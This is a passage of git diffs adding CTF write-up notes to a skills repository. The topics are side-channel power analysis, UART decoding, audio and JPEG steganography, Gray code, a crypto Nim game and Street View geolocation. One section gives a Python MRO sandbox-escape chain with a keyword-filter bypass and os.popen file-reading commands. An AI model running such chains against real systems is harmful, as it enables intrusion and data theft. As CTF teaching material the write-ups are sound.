 **Identification:** Challenge mentions "power", "side-channel", "leakage", "traces", or "measurements". Data is a multi-dimensional numeric array with axes for positions/guesses/traces/samples.
 
 **Key insight:** The "leak point" is the sample index where correct vs incorrect guesses show the largest power difference. Average across traces first to reduce noise, then find the sample with maximum variance across guesses.
+
+---
+
+## Saleae Logic 2 UART Decode (EHAX 2026)
+
+**Pattern (Baby Serial):** Saleae Logic 2 `.sal` file (ZIP archive) containing digital channel captures. Data encoded as UART serial.
+
+**File structure:** `.sal` is a ZIP containing `digital-0.bin` through `digital-7.bin` + `meta.json`. Only channel 0 typically has data.
+
+**Binary format (digital-*.bin):**
+```
+<SALEAE> magic (8 bytes)
+version: u32 = 2
+type: u32 = 100 (digital)
+initial_state: u32 (0 or 1)
+... header fields ...
+Delta-encoded transitions (variable-length integers)
+```
+
+**Delta encoding:** Each value represents the number of samples between state transitions. The signal alternates between HIGH and LOW at each delta.
+
+**UART decode from deltas:**
+```python
+import numpy as np
+
+# Parse deltas from binary (after header)
+# Reconstruct signal timeline
+times = np.cumsum(deltas)
+states = []
+state = initial_state
+for d in deltas:
+    states.append(state)
+    state ^= 1  # toggle on each transition
+
+# UART decode: detect start bit (HIGH→LOW), sample 8 data bits at bit centers
+# Baud rate detection: most common delta ≈ samples_per_bit
+# At 1MHz sample rate: 115200 baud ≈ 8.7 samples/bit
+
+def uart_decode(transitions, sample_rate=1_000_000, baud=115200):
+    bit_period = sample_rate / baud
+    bytes_out = []
+    i = 0
+    while i < len(transitions):
+        # Find start bit (falling edge)
+        if transitions[i] == 0:  # LOW = start bit
+            byte_val = 0
+            for bit in range(8):
+                sample_time = (1.5 + bit) * bit_period  # center of each bit
+                # Sample signal at this offset from start bit
+                bit_val = get_signal_at(sample_time)
+                byte_val |= (bit_val << bit)  # LSB first
+            bytes_out.append(byte_val)
+        i += 1
+    return bytes(bytes_out)
+```
+
+**Common pitfalls:**
+- **Inverted polarity:** UART idle is HIGH (mark). If initial_state=1, the encoding may be inverted — try both
+- **Baud rate guessing:** Check common rates: 9600, 19200, 38400, 57600, 115200, 230400
+- **Output format:** Decoded bytes may be base64-encoded (containing a PNG image or text)
+- **Saleae internal format ≠ export format:** The `.sal` internal binary uses a different encoding than CSV/binary export. Parse the raw delta transitions directly
+
+**Quick approach:** Install Saleae Logic 2, open the `.sal` file, add UART analyzer with auto-baud detection, export decoded data.
 
 ---
 

--- a/ctf-forensics/signals-and-hardware.md
+++ b/ctf-forensics/signals-and-hardware.md
@@ -5,6 +5,7 @@
 - [HDMI TMDS Decoding](#hdmi-tmds-decoding)
 - [DisplayPort 8b/10b + LFSR Decoding](#displayport-8b10b-lfsr-decoding)
 - [Voyager Golden Record Audio (0xFun 2026)](#voyager-golden-record-audio-0xfun-2026)
+- [Side-Channel Power Analysis (EHAX 2026)](#side-channel-power-analysis-ehax-2026)
 - [Flipper Zero .sub File (0xFun 2026)](#flipper-zero-sub-file-0xfun-2026)
 
 ---
@@ -141,6 +142,49 @@ img_arr = np.array(lines)
 img_arr = ((img_arr - img_arr.min()) / (img_arr.max() - img_arr.min()) * 255).astype(np.uint8)
 Image.fromarray(img_arr).save('voyager_image.png')
 ```
+
+---
+
+## Side-Channel Power Analysis (EHAX 2026)
+
+**Pattern (Power Leak):** Power consumption traces recorded during cryptographic operations. Correct key guesses cause measurably different power consumption at specific sample points.
+
+**Data format:** Typically a multi-dimensional array: `[positions × guesses × traces × samples]`. E.g., 6 digit positions × 10 guesses (0-9) × 20 traces × 50 samples.
+
+**Attack (Differential Power Analysis):**
+```python
+import numpy as np
+import hashlib
+
+# Load power traces: shape = (positions, guesses, traces, samples)
+data = np.load('power_traces.npy')  # or parse from CSV/JSON
+n_positions, n_guesses, n_traces, n_samples = data.shape
+
+# For each position, find the guess with maximum power at the leak point
+key_digits = []
+for pos in range(n_positions):
+    # Average across traces for each guess
+    avg_power = data[pos].mean(axis=1)  # shape: (guesses, samples)
+
+    # Find the sample point with maximum power variance across guesses
+    # This is the "leak point" where the correct guess stands out
+    variance_per_sample = avg_power.var(axis=0)
+    leak_sample = np.argmax(variance_per_sample)
+
+    # The guess with maximum power at the leak point is correct
+    best_guess = np.argmax(avg_power[:, leak_sample])
+    key_digits.append(best_guess)
+
+key = ''.join(str(d) for d in key_digits)
+print(f"Recovered key: {key}")
+
+# Flag may be SHA256 of the key
+flag = hashlib.sha256(key.encode()).hexdigest()
+```
+
+**Identification:** Challenge mentions "power", "side-channel", "leakage", "traces", or "measurements". Data is a multi-dimensional numeric array with axes for positions/guesses/traces/samples.
+
+**Key insight:** The "leak point" is the sample index where correct vs incorrect guesses show the largest power difference. Average across traces first to reduce noise, then find the sample with maximum variance across guesses.
 
 ---
 

--- a/ctf-forensics/steganography.md
+++ b/ctf-forensics/steganography.md
@@ -13,6 +13,8 @@
 - [Nested PNG with Iterating XOR Keys (VuwCTF 2025)](#nested-png-with-iterating-xor-keys-vuwctf-2025)
 - [DotCode Barcode via SSTV (0xFun 2026)](#dotcode-barcode-via-sstv-0xfun-2026)
 - [DTMF Audio Decoding](#dtmf-audio-decoding)
+- [Custom Frequency DTMF / Dual-Tone Keypad Encoding (EHAX 2026)](#custom-frequency-dtmf--dual-tone-keypad-encoding-ehax-2026)
+- [JPEG Unused Quantization Table LSB Steganography (EHAX 2026)](#jpeg-unused-quantization-table-lsb-steganography-ehax-2026)
 
 ---
 
@@ -294,3 +296,107 @@ sox phonehome.wav -t raw -r 22050 -e signed-integer -b 16 -c 1 - | \
 octal_groups = ["115", "145", "164", "141"]  # M, e, t, a
 flag = ''.join(chr(int(g, 8)) for g in octal_groups)
 ```
+
+---
+
+## Custom Frequency DTMF / Dual-Tone Keypad Encoding (EHAX 2026)
+
+**Pattern (Quantum Message):** Audio with dual-tone sequences at non-standard frequencies, aligned at regular intervals (e.g., every 1 second). Hints about "harmonic oscillators" or physics point to custom frequency design.
+
+**Identification:** Spectrogram shows two distinct frequency sets that don't match standard DTMF (697-1633 Hz). Look for evenly-spaced rows/columns of frequency tones.
+
+**Decoding workflow:**
+```python
+import numpy as np
+from scipy.io import wavfile
+
+rate, audio = wavfile.read('challenge.wav')
+
+# 1. Generate spectrogram to identify frequency grid
+# Use ffmpeg: ffmpeg -i challenge.wav -lavfi showspectrumpic=s=1920x1080 spec.png
+
+# 2. Map frequencies to keypad (custom grid, NOT standard DTMF)
+# Example: rows = [301, 902, 1503, 2104] Hz, cols = [2705, 3306, 3907] Hz
+# Forms 4x3 keypad -> digits 0-9 + symbols
+
+# 3. Extract tone pairs per time window
+window_size = rate  # 1 second per symbol
+for i in range(0, len(audio), window_size):
+    segment = audio[i:i+window_size]
+    freqs = np.fft.rfftfreq(len(segment), 1/rate)
+    magnitude = np.abs(np.fft.rfft(segment))
+    # Find two dominant peaks -> map to row/col -> digit
+
+# 4. Convert digit sequence to ASCII
+# Split digits into variable-length groups (ASCII range 32-126)
+# E.g., "72101108108111" -> [72, 101, 108, 108, 111] -> "Hello"
+def digits_to_ascii(digits):
+    result, i = [], 0
+    while i < len(digits):
+        for length in [2, 3]:  # ASCII codes are 2-3 digits
+            if i + length <= len(digits):
+                val = int(digits[i:i+length])
+                if 32 <= val <= 126:
+                    result.append(chr(val))
+                    i += length
+                    break
+        else:
+            i += 1
+    return ''.join(result)
+```
+
+**Key insight:** When tones don't match standard DTMF frequencies, generate a spectrogram first to identify the custom frequency grid. The mapping is challenge-specific.
+
+---
+
+## JPEG Unused Quantization Table LSB Steganography (EHAX 2026)
+
+**Pattern (Jpeg Soul):** "Insignificant" hint points to least significant bits in JPEG quantization tables (DQT). JPEG can embed DQT tables (ID 2, 3) that are never referenced by frame markers — invisible to renderers but carry hidden data.
+
+**Detection:** JPEG has more DQT tables than components reference. Standard JPEG uses 2 tables (luminance + chrominance); extra tables with IDs 2, 3 are suspicious.
+
+```python
+from PIL import Image
+
+img = Image.open('challenge.jpg')
+
+# Access quantization tables (PIL exposes them as dict)
+# Standard: tables 0 (luminance) and 1 (chrominance)
+# Hidden: tables 2, 3 (unreferenced by SOF marker)
+qtables = img.quantization
+
+bits = []
+for table_id in sorted(qtables.keys()):
+    if table_id >= 2:  # Unused tables
+        table = qtables[table_id]
+        for i in range(64):  # 8x8 = 64 values per DQT
+            bits.append(table[i] & 1)  # Extract LSB
+
+# Convert bits to ASCII
+flag = ''
+for i in range(0, len(bits) - 7, 8):
+    byte = int(''.join(str(b) for b in bits[i:i+8]), 2)
+    if 32 <= byte <= 126:
+        flag += chr(byte)
+print(flag)
+```
+
+**Manual DQT extraction (when PIL doesn't expose all tables):**
+```python
+# Parse JPEG manually to find all DQT markers (0xFFDB)
+data = open('challenge.jpg', 'rb').read()
+pos = 0
+while pos < len(data) - 1:
+    if data[pos] == 0xFF and data[pos+1] == 0xDB:
+        length = int.from_bytes(data[pos+2:pos+4], 'big')
+        dqt_data = data[pos+4:pos+2+length]
+        table_id = dqt_data[0] & 0x0F
+        precision = (dqt_data[0] >> 4) & 0x0F  # 0=8-bit, 1=16-bit
+        values = list(dqt_data[1:65]) if precision == 0 else []
+        print(f"DQT table {table_id}: {values[:8]}...")
+        pos += 2 + length
+    else:
+        pos += 1
+```
+
+**Key insight:** JPEG quantization tables are metadata — they survive recompression and most image processing. Unused table IDs (2-15) can carry arbitrary data without affecting the image.

--- a/ctf-forensics/steganography.md
+++ b/ctf-forensics/steganography.md
@@ -15,6 +15,7 @@
 - [DTMF Audio Decoding](#dtmf-audio-decoding)
 - [Custom Frequency DTMF / Dual-Tone Keypad Encoding (EHAX 2026)](#custom-frequency-dtmf--dual-tone-keypad-encoding-ehax-2026)
 - [JPEG Unused Quantization Table LSB Steganography (EHAX 2026)](#jpeg-unused-quantization-table-lsb-steganography-ehax-2026)
+- [Multi-Track Audio Differential Subtraction (EHAX 2026)](#multi-track-audio-differential-subtraction-ehax-2026)
 
 ---
 
@@ -400,3 +401,46 @@ while pos < len(data) - 1:
 ```
 
 **Key insight:** JPEG quantization tables are metadata — they survive recompression and most image processing. Unused table IDs (2-15) can carry arbitrary data without affecting the image.
+
+---
+
+## Multi-Track Audio Differential Subtraction (EHAX 2026)
+
+**Pattern (Penguin):** MKV/video file with two nearly-identical audio tracks. Hidden data is embedded as a tiny difference between the tracks, invisible when listening to either individually.
+
+**Identification:**
+- `ffprobe` reveals multiple audio streams (e.g., two stereo FLAC tracks)
+- Metadata may contain a decoy flag (e.g., in comments)
+- Track labels may be misleading (e.g., stereo labeled as "5.1 surround")
+- `sox --info` / `sox -n stat` shows nearly identical RMS, amplitude, and frequency statistics for both tracks
+
+**Extraction workflow:**
+```bash
+# 1. Extract both audio tracks
+ffmpeg -i challenge.mkv -map 0:a:0 -c copy track0.flac
+ffmpeg -i challenge.mkv -map 0:a:1 -c copy track1.flac
+
+# 2. Convert to WAV for processing
+ffmpeg -i track0.flac track0.wav
+ffmpeg -i track1.flac track1.wav
+
+# 3. Subtract: invert one track and mix (cancels shared content)
+sox -m track0.wav "|sox track1.wav -p vol -1" diff.wav
+
+# 4. Normalize the difference signal
+sox diff.wav diff_norm.wav gain -n -3
+
+# 5. Generate spectrogram to read the flag
+sox diff_norm.wav -n spectrogram -o spectrogram.png -X 2000 -Y 1000 -z 100 -h
+
+# 6. Optional: filter to isolate flag frequency range
+sox diff_norm.wav filtered.wav sinc 5000-12000
+sox filtered.wav -n spectrogram -o filtered_spec.png -X 2000 -Y 1000 -z 100 -h
+```
+
+**Key insight:** When two audio tracks are nearly identical, subtracting one from the other (phase inversion + mix) cancels shared content and isolates hidden data. The flag is typically encoded as text in the spectrogram of the difference signal, visible in a specific frequency band (e.g., 5-12 kHz).
+
+**Common traps:**
+- Decoy flags in metadata/comments — always verify
+- Mislabeled channel configurations (stereo as 5.1)
+- Flag may only be visible in a narrow time window — use high-resolution spectrogram (`-X 2000+`)

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -19,7 +19,7 @@ Quick reference for miscellaneous CTF challenges. Each technique has a one-liner
 - [encodings.md](encodings.md) - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding
 - [rf-sdr.md](rf-sdr.md) - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
 - [dns.md](dns.md) - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
-- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation
+- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim
 
 ---
 

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-misc
-description: Miscellaneous CTF challenge techniques. Use for encoding puzzles, RF/SDR signal processing, Python/bash jails, DNS exploitation, unicode steganography, floating-point tricks, QR codes, audio challenges, Z3 constraint solving, Kubernetes RBAC, WASM game patching, esoteric languages, or challenges that don't fit other categories.
+description: Miscellaneous CTF challenge techniques. Use for encoding puzzles, RF/SDR signal processing, Python/bash jails, DNS exploitation, unicode steganography, floating-point tricks, QR codes, audio challenges, Z3 constraint solving, Kubernetes RBAC, WASM game patching, esoteric languages, game theory, commitment schemes, combinatorial games, or challenges that don't fit other categories.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch Skill

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -19,7 +19,7 @@ Quick reference for miscellaneous CTF challenges. Each technique has a one-liner
 - [encodings.md](encodings.md) - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding
 - [rf-sdr.md](rf-sdr.md) - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
 - [dns.md](dns.md) - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
-- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim
+- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim, custom assembly language sandbox escape via Python MRO chain
 
 ---
 

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -16,7 +16,7 @@ Quick reference for miscellaneous CTF challenges. Each technique has a one-liner
 
 - [pyjails.md](pyjails.md) - Python jail/sandbox escape techniques
 - [bashjails.md](bashjails.md) - Bash jail/restricted shell escape techniques
-- [encodings.md](encodings.md) - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding
+- [encodings.md](encodings.md) - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding, Gray code cyclic encoding
 - [rf-sdr.md](rf-sdr.md) - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
 - [dns.md](dns.md) - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
 - [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim, custom assembly language sandbox escape via Python MRO chain

--- a/ctf-misc/encodings.md
+++ b/ctf-misc/encodings.md
@@ -21,6 +21,7 @@
 - [Esoteric Languages](#esoteric-languages)
   - [Custom Brainfuck Variants (Themed Esolangs)](#custom-brainfuck-variants-themed-esolangs)
 - [Verilog/HDL](#veriloghdl)
+- [Gray Code Cyclic Encoding (EHAX 2026)](#gray-code-cyclic-encoding-ehax-2026)
 - [Binary Tree Key Encoding](#binary-tree-key-encoding)
 
 ---
@@ -268,6 +269,39 @@ def verilog_module(input_byte):
     wire_b = input_byte & 0xF
     return wire_a ^ wire_b
 ```
+
+---
+
+## Gray Code Cyclic Encoding (EHAX 2026)
+
+**Pattern (#808080):** Web interface with a circular wheel (5 concentric circles = 5 bits, 32 positions). Must fill in a valid Gray code sequence where consecutive values differ by exactly one bit.
+
+**Gray code properties:**
+- N-bit Gray code has 2^N unique values
+- Adjacent values differ by exactly 1 bit (Hamming distance = 1)
+- The sequence is **cyclic** — rotating the start position produces another valid sequence
+- Standard conversion: `gray = n ^ (n >> 1)`
+
+```python
+# Generate N-bit Gray code sequence
+def gray_code(n_bits):
+    return [i ^ (i >> 1) for i in range(1 << n_bits)]
+
+# 5-bit Gray code: 32 values
+seq = gray_code(5)
+# [0, 1, 3, 2, 6, 7, 5, 4, 12, 13, 15, 14, 10, 11, 9, 8, ...]
+
+# Rotate sequence by k positions (cyclic property)
+def rotate(seq, k):
+    return seq[k:] + seq[:k]
+
+# If decoded output is ROT-N shifted, rotate the Gray code start by N positions
+rotated = rotate(seq, 4)  # Shift start by 4
+```
+
+**Key insight:** If the decoded output looks correct but shifted (e.g., ROT-4), the Gray code start position needs cyclic rotation by the same offset. The cyclic property guarantees all rotations remain valid Gray codes.
+
+**Wheel mapping:** Each concentric circle = one bit position. Innermost = bit 0, outermost = bit N-1. Read bits at each angular position to build N-bit values.
 
 ---
 

--- a/ctf-misc/games-and-vms.md
+++ b/ctf-misc/games-and-vms.md
@@ -19,6 +19,7 @@
   - [Why It Works](#why-it-works)
   - [Red Flags in Challenges](#red-flags-in-challenges)
   - [Quick Test Script](#quick-test-script)
+- [Custom Assembly Language Sandbox Escape (EHAX 2026)](#custom-assembly-language-sandbox-escape-ehax-2026)
 - [memfd_create Packed Binaries](#memfd_create-packed-binaries)
 - [Multi-Phase Interactive Crypto Game (EHAX 2026)](#multi-phase-interactive-crypto-game-ehax-2026)
 - [References](#references)
@@ -322,6 +323,47 @@ find_exploit(1e15, 5e15, 0.05)  # Returns 0.56
 
 ---
 
+## Custom Assembly Language Sandbox Escape (EHAX 2026)
+
+**Pattern (Chusembly):** Web app with custom instruction set (LD, PUSH, PROP, CALL, IDX, etc.) running on a Python backend. Safety check only blocks the word "flag" in source code.
+
+**Key insight:** `PROP` (property access) and `CALL` (function invocation) instructions allow traversing Python's MRO chain from any object to achieve RCE, similar to Jinja2 SSTI.
+
+**Exploit chain:**
+```
+LD 0x48656c6c6f A     # Load "Hello" string into register A
+PROP __class__ A      # str → <class 'str'>
+PROP __base__ E       # str → <class 'object'> (E = result register)
+PROP __subclasses__ E # object → bound method
+CALL E                # object.__subclasses__() → list of all classes
+# Find os._wrap_close at index 138 (varies by Python version)
+IDX 138 E             # subclasses[138] = os._wrap_close
+PROP __init__ E       # get __init__ method
+PROP __globals__ E    # access function globals
+# Use __getitem__ to access builtins without triggering keyword filter
+PUSH 0x5f5f6275696c74696e735f5f  # "__builtins__" as hex
+CALL __getitem__ E               # globals["__builtins__"]
+# Bypass "flag" keyword filter with hex encoding
+PUSH 0x666c61672e747874          # "flag.txt" as hex
+CALL open E                      # open("flag.txt")
+CALL read E                      # read file contents
+STDOUT E                         # print flag
+```
+
+**Filter bypass techniques:**
+- **Hex-encoded strings:** `0x666c61672e747874` → `"flag.txt"` bypasses keyword filters
+- **os.popen for shell:** If file path is unknown, use `os.popen('ls /').read()` then `os.popen('cat /flag*').read()`
+- **Subclass index discovery:** Iterate through `__subclasses__()` list to find useful classes (os._wrap_close, subprocess.Popen, etc.)
+
+**General approach for custom language challenges:**
+1. **Read the docs:** Check `/docs`, `/help`, `/api` endpoints for instruction reference
+2. **Find the result register:** Many custom languages have a special register for return values
+3. **Test string handling:** Try hex-encoded strings to bypass keyword filters
+4. **Chain Python MRO:** Any Python string object → `__class__.__base__.__subclasses__()` → RCE
+5. **Error messages leak info:** Intentional errors reveal Python internals and available classes
+
+---
+
 ## memfd_create Packed Binaries
 
 ```python
@@ -412,3 +454,4 @@ def is_winning(state):
 - 0xL4ugh CTF: PyInstaller + opcode remapping
 - 0xFun 2026 "MazeRunna": Roblox version history + binary place file parsing
 - EHAX 2026 "The Architect's Gambit": Multi-phase AES + HMAC + GF(256) Nim
+- EHAX 2026 "Chusembly": Custom assembly language with Python MRO chain RCE

--- a/ctf-misc/games-and-vms.md
+++ b/ctf-misc/games-and-vms.md
@@ -20,6 +20,7 @@
   - [Red Flags in Challenges](#red-flags-in-challenges)
   - [Quick Test Script](#quick-test-script)
 - [memfd_create Packed Binaries](#memfd_create-packed-binaries)
+- [Multi-Phase Interactive Crypto Game (EHAX 2026)](#multi-phase-interactive-crypto-game-ehax-2026)
 - [References](#references)
 
 ---
@@ -332,8 +333,82 @@ open("dumped", "wb").write(decrypted)
 
 ---
 
+## Multi-Phase Interactive Crypto Game (EHAX 2026)
+
+**Pattern (The Architect's Gambit):** Server presents a multi-phase challenge combining cryptography, game theory, and commitment-reveal protocols.
+
+**Phase structure:**
+1. **Phase 1 (AES-ECB decryption):** Decrypt pile values with provided key. Determine winner from game state.
+2. **Phase 2 (AES-CBC with derived keys):** Keys derived via SHA-256 chain from Phase 1 results. Decrypt to get game parameters.
+3. **Phase 3 (Interactive gameplay):** Play optimal moves in a combinatorial game, bound by commitment-reveal protocol.
+
+**Commitment-reveal (HMAC binding):**
+```python
+import hmac, hashlib
+
+def compute_binding_token(session_nonce, answer):
+    """Server verifies your answer commitment before revealing result."""
+    message = f"answer:{answer}".encode()
+    return hmac.new(session_nonce, message, hashlib.sha256).hexdigest()
+
+# Flow: send token first, then server reveals state, then send answer
+# Server checks: HMAC(nonce, answer) == your_token
+# Prevents changing your answer after seeing the state
+```
+
+**GF(2^8) arithmetic for game drain calculations:**
+```python
+# Galois Field GF(256) used in some game mechanics (Nim variants)
+# Nim-value XOR determines winning/losing positions
+
+def gf256_mul(a, b, poly=0x11b):
+    """Multiply in GF(2^8) with irreducible polynomial."""
+    result = 0
+    while b:
+        if b & 1:
+            result ^= a
+        a <<= 1
+        if a & 0x100:
+            a ^= poly
+        b >>= 1
+    return result
+
+# Nim game with GF(256) move rules:
+# Position is losing if Nim-value (XOR of pile Grundy values) is 0
+# Optimal move: find pile where removing stones makes XOR sum = 0
+```
+
+**Game tree memoization (C++ for performance):**
+```python
+# Python too slow for large state spaces — use C++ with memoization
+# State compression: encode all pile sizes into single integer
+# Cache: unordered_map<state_t, bool> for win/loss determination
+
+# Python fallback for small games:
+from functools import lru_cache
+
+@lru_cache(maxsize=None)
+def is_winning(state):
+    """Returns True if current player can force a win."""
+    state = tuple(sorted(state))  # Normalize for caching
+    for move in generate_moves(state):
+        next_state = apply_move(state, move)
+        if not is_winning(next_state):
+            return True  # Found a move that puts opponent in losing position
+    return False  # All moves lead to opponent winning
+```
+
+**Key insights:**
+- Multi-phase challenges require solving each phase sequentially — each phase's output feeds the next
+- HMAC commitment-reveal prevents guessing; you must compute the correct answer
+- GF(256) Nim variants require Sprague-Grundy theory, not brute force
+- When Python recursion is too slow (>10s), rewrite game solver in C++ with state compression and memoization
+
+---
+
 ## References
 - Pragyan 2026 "Tac Tic Toe": WASM minimax patching
 - LACTF 2026 "CTFaaS": K8s RBAC bypass via hostPath
 - 0xL4ugh CTF: PyInstaller + opcode remapping
 - 0xFun 2026 "MazeRunna": Roblox version history + binary place file parsing
+- EHAX 2026 "The Architect's Gambit": Multi-phase AES + HMAC + GF(256) Nim

--- a/ctf-osint/SKILL.md
+++ b/ctf-osint/SKILL.md
@@ -15,7 +15,7 @@ Quick reference for OSINT CTF challenges. Each technique has a one-liner here; s
 ## Additional Resources
 
 - [social-media.md](social-media.md) - Twitter/X (user IDs, Snowflake timestamps, Nitter, memory.lol, Wayback CDX), Tumblr (blog checks, post JSON, avatars), BlueSky search + API, Unicode homoglyph steganography, Discord API, username OSINT (namechk, whatsmyname), platform false positives, multi-platform chains
-- [geolocation-and-media.md](geolocation-and-media.md) - Image analysis, reverse image search, geolocation techniques (railroad signs, infrastructure maps, MGRS), EXIF/metadata, hardware identification, newspaper archives, IP geolocation
+- [geolocation-and-media.md](geolocation-and-media.md) - Image analysis, reverse image search, geolocation techniques (railroad signs, infrastructure maps, MGRS), EXIF/metadata, hardware identification, newspaper archives, IP geolocation, Google Street View panorama matching
 - [web-and-dns.md](web-and-dns.md) - Google dorking, Google Docs/Sheets enumeration, DNS recon (TXT, zone transfers), Wayback Machine, FEC research, Tor relay lookups, GitHub repository analysis, Telegram bot investigation
 
 ---
@@ -47,6 +47,7 @@ Quick reference for OSINT CTF challenges. Each technique has a one-liner here; s
 ## Geolocation
 
 - Railroad signs, infrastructure maps (OpenRailwayMap, OpenInfraMap), process of elimination. See [geolocation-and-media.md](geolocation-and-media.md).
+- **Street View panorama matching:** Feature extraction + multi-metric image similarity ranking against candidate panoramas. Useful when challenge image is a crop of a Street View photo. See [geolocation-and-media.md](geolocation-and-media.md).
 
 ## MGRS Coordinates
 

--- a/ctf-osint/SKILL.md
+++ b/ctf-osint/SKILL.md
@@ -48,6 +48,8 @@ Quick reference for OSINT CTF challenges. Each technique has a one-liner here; s
 
 - Railroad signs, infrastructure maps (OpenRailwayMap, OpenInfraMap), process of elimination. See [geolocation-and-media.md](geolocation-and-media.md).
 - **Street View panorama matching:** Feature extraction + multi-metric image similarity ranking against candidate panoramas. Useful when challenge image is a crop of a Street View photo. See [geolocation-and-media.md](geolocation-and-media.md).
+- **Road sign OCR:** Extract text from directional signs (town names, route numbers) to pinpoint road corridors. Driving side + sign style + script identify the country. See [geolocation-and-media.md](geolocation-and-media.md).
+- **Architecture + brand identification:** Post-Soviet concrete = Russia/CIS; named businesses → search locations/branches → cross-reference with coastline/terrain. See [geolocation-and-media.md](geolocation-and-media.md).
 
 ## MGRS Coordinates
 

--- a/ctf-osint/geolocation-and-media.md
+++ b/ctf-osint/geolocation-and-media.md
@@ -9,6 +9,7 @@
 - [Metadata Extraction](#metadata-extraction)
 - [Hardware/Product Identification](#hardwareproduct-identification)
 - [Newspaper Archives and Historical Research](#newspaper-archives-and-historical-research)
+- [Google Street View Panorama Matching (EHAX 2026)](#google-street-view-panorama-matching-ehax-2026)
 - [IP Geolocation and Attribution](#ip-geolocation-and-attribution)
 
 ---
@@ -72,6 +73,55 @@ mediainfo video.mp4          # Video metadata
 **Pattern (It's News, VuwCTF 2025):** Combine newspaper archive date search with EXIF GPS coordinates for location-specific identification.
 
 **Tools:** Library of Congress newspaper archive, Google Maps for GPS coordinate lookup.
+
+## Google Street View Panorama Matching (EHAX 2026)
+
+**Pattern (amnothappyanymore):** Challenge image is a cropped section of a Google Street View panorama. Must identify the exact panorama ID and coordinates.
+
+**Approach:**
+1. **Extract visual features:** Identify distinctive landmarks (road type, vehicles, containers, mountain shapes, building styles, vegetation)
+2. **Narrow the region:** Use visual clues to identify country/region (e.g., Greenland landscape, specific road infrastructure)
+3. **Compile candidate panoramas:** Use Google Street View coverage maps to find panoramas in the identified region
+4. **Feature matching:** Compare challenge image features against candidate panoramas:
+   ```python
+   import cv2
+   import numpy as np
+
+   # Load challenge image and candidate panorama
+   challenge = cv2.imread('challenge.jpg')
+   candidate = cv2.imread('panorama.jpg')
+
+   # ORB feature detection and matching
+   orb = cv2.ORB_create(nfeatures=5000)
+   kp1, des1 = orb.detectAndCompute(challenge, None)
+   kp2, des2 = orb.detectAndCompute(candidate, None)
+
+   bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
+   matches = bf.match(des1, des2)
+   score = sum(1 for m in matches if m.distance < 50)
+   ```
+5. **Ranking systems:** Use multiple scoring methods (global feature match, local patch comparison, color histogram analysis) and combine rankings
+6. **API submission:** Submit panorama ID with coordinates in required format (e.g., `lat/lng/sessionId/nonce`)
+
+**Google Street View API patterns:**
+```python
+# Street View metadata API (check if coverage exists)
+# GET https://maps.googleapis.com/maps/api/streetview/metadata?location=LAT,LNG&key=KEY
+
+# Street View image API
+# GET https://maps.googleapis.com/maps/api/streetview?size=640x480&location=LAT,LNG&heading=90&key=KEY
+
+# Panorama ID from page source (parsed from JavaScript):
+# Look for panoId in page data structures
+```
+
+**Key insights:**
+- Challenge images are often crops of panoramas — the crop region may not include horizon or sky, making geolocation harder
+- Distinctive elements: road surface type, vehicle makes, signage language, utility poles, container colors
+- Greenland, Iceland, Faroe Islands have limited Street View coverage — enumerate all panoramas in the region
+- Image similarity ranking with multiple metrics (feature matching + color analysis + patch comparison) is more robust than any single method
+
+---
 
 ## IP Geolocation and Attribution
 

--- a/ctf-osint/geolocation-and-media.md
+++ b/ctf-osint/geolocation-and-media.md
@@ -10,6 +10,8 @@
 - [Hardware/Product Identification](#hardwareproduct-identification)
 - [Newspaper Archives and Historical Research](#newspaper-archives-and-historical-research)
 - [Google Street View Panorama Matching (EHAX 2026)](#google-street-view-panorama-matching-ehax-2026)
+- [Road Sign Language and Driving Side Analysis (EHAX 2026)](#road-sign-language-and-driving-side-analysis-ehax-2026)
+- [Post-Soviet Architecture and Brand Identification (EHAX 2026)](#post-soviet-architecture-and-brand-identification-ehax-2026)
 - [IP Geolocation and Attribution](#ip-geolocation-and-attribution)
 
 ---
@@ -120,6 +122,64 @@ mediainfo video.mp4          # Video metadata
 - Distinctive elements: road surface type, vehicle makes, signage language, utility poles, container colors
 - Greenland, Iceland, Faroe Islands have limited Street View coverage — enumerate all panoramas in the region
 - Image similarity ranking with multiple metrics (feature matching + color analysis + patch comparison) is more robust than any single method
+
+---
+
+## Road Sign Language and Driving Side Analysis (EHAX 2026)
+
